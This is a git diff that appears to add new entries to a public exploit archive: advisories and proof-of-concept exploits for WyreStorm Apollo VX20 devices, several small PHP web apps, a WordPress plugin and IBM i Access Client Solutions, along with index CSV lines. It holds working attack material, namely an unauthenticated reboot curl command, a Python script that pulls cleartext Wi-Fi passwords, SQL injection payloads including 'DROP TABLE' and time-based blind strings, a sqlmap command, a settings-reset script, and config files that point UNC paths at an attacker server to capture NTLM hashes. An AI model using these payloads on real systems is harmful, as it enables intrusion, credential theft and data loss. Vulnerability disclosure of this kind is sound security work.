diff --git a/exploits/multiple/dos/51815.txt b/exploits/multiple/dos/51815.txt new file mode 100644 index 0000000000..9f85b9eff6 --- /dev/null +++ b/exploits/multiple/dos/51815.txt @@ -0,0 +1,63 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.wyrestorm.com + + +[Product] +APOLLO VX20 < 1.3.58 + + +[Vulnerability Type] +Incorrect Access Control (DOS) + + +[Affected Product Code Base] +APOLLO VX20 < 1.3.58, fixed in v1.3.58 + + +[Affected Component] +Web interface, reboot and reset commands + + +[CVE Reference] +CVE-2024-25736 + + +[Security Issue] +An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request. + + +[Exploit/POC] +curl -k https://192.168.x.x/device/reboot + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: January 18, 2024 +Vendor released fixed firmware v1.3.58: February 2, 2024 +February 11, 2024 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/multiple/remote/51814.txt b/exploits/multiple/remote/51814.txt new file mode 100644 index 0000000000..0f04052224 --- /dev/null +++ b/exploits/multiple/remote/51814.txt @@ -0,0 +1,63 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.wyrestorm.com + + +[Product] +APOLLO VX20 < 1.3.58 + +[Vulnerability Type] +Account Enumeration + + +[CVE Reference] +CVE-2024-25734 + + +[Security Issue] +An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered. +Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account. + + +[Exploit/POC] +TELNET x.x.x.x 23 +username:aa +username:bb +username:admin +password: + + +[Network Access] +Remote + + +[Affected Product Code Base] +APOLLO VX20 - < 1.3.58, fixed in v1.3.58 + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: January 18, 2024 +Vendor released fixed firmware v1.3.58: February 2, 2024 +February 11, 2024 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/multiple/remote/51816.txt b/exploits/multiple/remote/51816.txt new file mode 100644 index 0000000000..ab6e90bceb --- /dev/null +++ b/exploits/multiple/remote/51816.txt @@ -0,0 +1,83 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.wyrestorm.com + + +[Product] +APOLLO VX20 < 1.3.58 + + +[Vulnerability Type] +Incorrect Access Control (Credentials Disclosure) + + +[Affected Component] +Web interface, config + + +[Affected Product Code Base] +APOLLO VX20 < 1.3.58, fixed in v1.3.58 + + +[CVE Reference] +CVE-2024-25735 + + +[Security Issue] +An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. +Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request. +The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config + +E.g. HTTP response snippet: + +:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"} +,"softAp":{"password":"12345678","router":"y","softAp":"y"}... + + +[Exploit/POC] +import requests + +target="https://x.x.x.x" +res = requests.get(target+"/device/config", verify=False) + +idx=res.content.find('{"password":') +if idx != -1: + idx2=res.content.find('router') + if idx2 != -1: + print("[+] CVE-2024-25735 Credentials Disclosure") + print("[+] " + res.content[idx + 1:idx2 + 11]) + print("[+] hyp3rlinx") +else: + print("[!] Apollo vX20 Device not vulnerable...") + + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: January 18, 2024 +Vendor released fixed firmware v1.3.58: February 2, 2024 +February 11, 2024 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/php/remote/51808.txt b/exploits/php/remote/51808.txt new file mode 100644 index 0000000000..244bd1d3f6 --- /dev/null +++ b/exploits/php/remote/51808.txt @@ -0,0 +1,64 @@ +# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection +# Google Dork: N/A +# Application: Simple Inventory Management System +# Date: 26.02.2024 +# Bugs: SQL Injection +# Exploit Author: SoSPiro +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: Windows 10 64 bit Wampserver +# CVE : N/A + + +## Vulnerability Description: + +This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input. + + +## Proof of Concept (PoC): + +An example attacker could input the following values: + +email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b' +pwd: test + +This would result in the following SQL query: + +SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything' + +This attack would retrieve all users, making the login process always successful. + +request-response foto:https://i.imgur.com/slkzYJt.png + + +## Vulnerable code section: +==================================================== +ims/login.php + +login($_POST['email'], $_POST['pwd']); + // + +if(!empty($login)) { + $_SESSION['userid'] = $login[0]['userid']; + $_SESSION['name'] = $login[0]['name']; + header("Location:index.php"); + } else { + $loginError = "Invalid email or password!"; + } +} +?> + + + +## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html \ No newline at end of file diff --git a/exploits/php/remote/51812.txt b/exploits/php/remote/51812.txt new file mode 100644 index 0000000000..239b24cae7 --- /dev/null +++ b/exploits/php/remote/51812.txt @@ -0,0 +1,46 @@ +# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection +# Google Dork: N/A +# Application: Flashcard Quiz App +# Date: 25.02.2024 +# Bugs: SQL Injection +# Exploit Author: SoSPiro +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html +# Version: 1.0 +# Tested on: Windows 10 64 bit Wampserver +# CVE : N/A + + +## Vulnerability Description: + +The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. + + +## Proof of Concept (PoC): + +This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL. + +1. Original Code: + +$card = $_GET['card']; + +$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'"; + +2. Payload: + +' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); -- + +3. Injected Query: + +DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); -- + +Request Response foto: https://i.imgur.com/5IXvpiZ.png + + +## Vulnerable code section: +==================================================== +endpoint/delete-flashcard.php + +$card = $_GET['card']; + +$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'"; \ No newline at end of file diff --git a/exploits/php/remote/51813.txt b/exploits/php/remote/51813.txt new file mode 100644 index 0000000000..7aed953e32 --- /dev/null +++ b/exploits/php/remote/51813.txt @@ -0,0 +1,48 @@ +# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection +# Google Dork: N/A +# Application: FAQ Management System +# Date: 25.02.2024 +# Bugs: SQL Injection +# Exploit Author: SoSPiro +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html +# Version: 1.0 +# Tested on: Windows 10 64 bit Wampserver +# CVE : N/A + + +## Vulnerability Description: + +The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations. + + +## Proof of Concept (PoC): + +An attacker can manipulate the 'faq' parameter to perform SQL injection. For example: + +1. Original Request: +http://example.com/endpoint/delete-faq.php?faq=123 + +2.Malicious Request (SQL Injection): +http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; -- + +This would result in a query like: + +DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; -- + +Which can lead to the deletion of data or even the entire table. + + +poc foto: https://i.imgur.com/1IENYFg.png + + +## Vulnerable code section: +==================================================== +endpoint/delete-faq.php + + +$faq = $_GET['faq']; + +// ... + +$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'"; \ No newline at end of file diff --git a/exploits/php/webapps/51809.py b/exploits/php/webapps/51809.py new file mode 100755 index 0000000000..66b8ed7c58 --- /dev/null +++ b/exploits/php/webapps/51809.py @@ -0,0 +1,62 @@ +# Exploit Title: POC-CVE-2023-3244 +# Date: 9/12/2023 +# Exploit Author: Diaa Hanna +# Software Link: [download link if available] +# Version: <= 1.2.0 comments-like-dislike +# Tested on: 1.1.6 comments-like-dislike +# CVE : CVE-2023-3244 + +#References +#https://nvd.nist.gov/vuln/detail/CVE-2023-3244 + + +#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin. +#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users. +#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244). + +import requests +import argparse +import sys +from colorama import Fore + +parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ') +parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True) +parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True) +parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True) +parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False) +args=parser.parse_args() + +#check if the domain ends with a '/' if not then add it +url=args.url +if url[-1] != '/': + url+='/' + + + +wp_login = f'{url}wp-login.php' +wp_admin = f'{url}wp-admin/' +username = args.username +password = args.password + + +session=requests.Session() +#logging in +session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In', + 'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl)) +#if failed to login +if len(session.cookies.get_dict()) == 2: + print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again") + sys.exit(1) + +#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function +#the restore_settings function does not check the sufficient privileges of a logged-in user +#even a subscriber can use this POC +response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl)) + +if response.text == "Settings restored successfully.Redirecting...": + print(Fore.GREEN +"exploited excuted successfully") + print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server") + sys.exit(0) +else: + print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway") + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/51810.txt b/exploits/php/webapps/51810.txt new file mode 100644 index 0000000000..1545b571b0 --- /dev/null +++ b/exploits/php/webapps/51810.txt @@ -0,0 +1,67 @@ +# Exploit Title: taskhub 2.8.7 - SQL Injection +# Exploit Author: CraCkEr +# Date: 05/09/2023 +# Vendor: Infinitie Technologies +# Vendor Homepage: https://www.infinitietech.com/ +# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874 +# Demo: https://taskhub.company/auth +# Tested on: Windows 10 Pro +# Impact: Database Access +# CVE: CVE-2023-4987 +# CWE: CWE-89 - CWE-74 - CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + +Path: /home/get_tasks_list + +GET parameter 'project' is vulnerable to SQL Injection +GET parameter 'status' is vulnerable to SQL Injection +GET parameter 'user_id' is vulnerable to SQL Injection +GET parameter 'sort' is vulnerable to SQL Injection +GET parameter 'search' is vulnerable to SQL Injection + + +https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi] + + +--- +Parameter: project (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search= + +Parameter: status (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search= + +Parameter: user_id (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search= + +Parameter: sort (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search= + +Parameter: search (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW +--- + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51811.txt b/exploits/php/webapps/51811.txt new file mode 100644 index 0000000000..5441aa6188 --- /dev/null +++ b/exploits/php/webapps/51811.txt @@ -0,0 +1,75 @@ +# Exploit Title: Online Shopping System Advanced + +# Date: 07.12.2023 + +# Exploit Author: Furkan Gedik + +# Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced + +# Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced + +# Version: 1.0 + +# Tested on: [Kali Linux 2020.3] + + + + + + + +# Description + +Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database. + + + +# PoC + + + +[+] sqlmap output + +sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080 + + + +Parameter: cm (GET) + + Type: time-based blind + + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + + Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV + + + +# Vulnerability + +https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22 + +[+] payment_success.php + +if (isset($_GET["st"])) { + + + # code... + + $trx_id = $_GET["tx"]; + + $p_st = $_GET["st"]; + + $amt = $_GET["amt"]; + + $cc = $_GET["cc"]; + + $cm_user_id = $_GET["cm"]; + + $c_amt = $_COOKIE["ta"]; + + if ($p_st == "Completed") { + + + include_once("db.php"); + + $sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'"; \ No newline at end of file diff --git a/exploits/windows_x86-64/remote/51817.txt b/exploits/windows_x86-64/remote/51817.txt new file mode 100644 index 0000000000..91fb700abc --- /dev/null +++ b/exploits/windows_x86-64/remote/51817.txt @@ -0,0 +1,96 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + +[Vendor] +www.ibm.com + +[Product] +IBM i Access Client Solutions + +[Versions] +All + +[Remediation/Fixes] +None + +[Vulnerability Type] +Remote Credential Theft + +[CVE Reference] +CVE-2024-22318 + + +[Security Issue] +IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations. +Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server. +If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session. +The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials. + + +[References] +https://www.ibm.com/support/pages/node/7116091 + + +[Exploit/POC] +The client access .HOD File vulnerable parameters: + +1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c + +[KeyRemapFile] +2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c + +Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv + +The client access legacy .WS File vulnerable parameters: +DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c + +Example, client access older .WS file + +[Profile] +ID=WS +Version=9 +[Telnet5250] +AssociatedPrinterStartMinimized=N +AssociatedPrinterTimeout=0 +SSLClientAuthentication=Y +HostName=PWN +AssociatedPrinterClose=N +Security=CA400 +CertSelection=AUTOSELECT +AutoReconnect=Y +[KeepAlive] +KeepAliveTimeOut=0 +[Keyboard] +IBMDefaultKeyboard=N +DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c +[Communication] +Link=telnet5250 + + +[Network Access] +Remote + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: December 14, 2023 +Vendor Addresses Issue: February 7, 2024 +February 8, 2024 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 74b8436999..90c9235953 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10317,6 +10317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15707,exploits/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",dos,multiple,,2010-12-08,2010-12-15,0,CVE-2010-4557;OSVDB-69936,,udpsz.zip,,,http://aluigi.org/adv/inbatch_1-adv.txt 33099,exploits/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",dos,multiple,,2009-06-16,2014-05-01,1,,,,,,https://www.securityfocus.com/bid/35751/info 31957,exploits/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",dos,multiple,,2008-06-23,2014-03-03,1,CVE-2008-6713;OSVDB-46533,,,,,https://www.securityfocus.com/bid/29888/info +51815,exploits/multiple/dos/51815.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'",2024-02-26,hyp3rlinx,dos,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25736,,,,, 26145,exploits/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",dos,multiple,,2005-08-10,2013-06-13,1,CVE-2005-2577;OSVDB-18698,,,,,https://www.securityfocus.com/bid/14536/info 5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple,,2008-02-18,,1,CVE-2007-5958,,,,, 25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1078;OSVDB-15636,,,,,https://www.securityfocus.com/bid/13131/info @@ -11547,6 +11548,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info 32987,exploits/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple,,2009-05-05,2014-04-23,1,CVE-2009-1554;OSVDB-54220,,,,,https://www.securityfocus.com/bid/34829/info 201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm, +51814,exploits/multiple/remote/51814.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25734,,,,, +51816,exploits/multiple/remote/51816.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25735,,,,, 9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,, 1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe, 51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,, @@ -12934,6 +12937,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb 51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,, 24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,, +51813,exploits/php/remote/51813.txt,"FAQ Management System v1.0 - 'faq' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,, +51812,exploits/php/remote/51812.txt,"Flashcard Quiz App v1.0 - 'card' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,, 40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,, 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,,2018-07-09,2018-07-09,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgitlist-0.6.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/545e91af0077d1039b0f861346aada45fdfdf10e/modules/exploits/multi/http/gitlist_arg_injection.rb @@ -13069,6 +13074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21138,exploits/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,remote,php,,2012-09-08,2012-09-08,1,OSVDB-83767,"Metasploit Framework (MSF)",,,, 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,,2019-05-23,2019-05-23,1,CVE-2017-18357,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb 31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80,2014-01-29,2014-01-29,1,OSVDB-102635,"Metasploit Framework (MSF)",,,, +51808,exploits/php/remote/51808.txt,"Simple Inventory Management System v1.0 - 'email' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,, 27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,remote,php,,2013-08-29,2013-08-29,1,OSVDB-83543,"Metasploit Framework (MSF)",,,, 24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,"Metasploit Framework (MSF)",,,, 24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,Malware,,,, @@ -16112,6 +16118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37436,exploits/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54111/info 19325,exploits/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",webapps,php,,2012-06-21,2012-06-21,0,OSVDB-83148;OSVDB-83147;OSVDB-83146,,,,http://www.exploit-db.comcommentics.zip, 2648,exploits/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",webapps,php,,2006-10-24,,1,,,,,, +51809,exploits/php/webapps/51809.py,"comments-like-dislike < 1.2.0 - 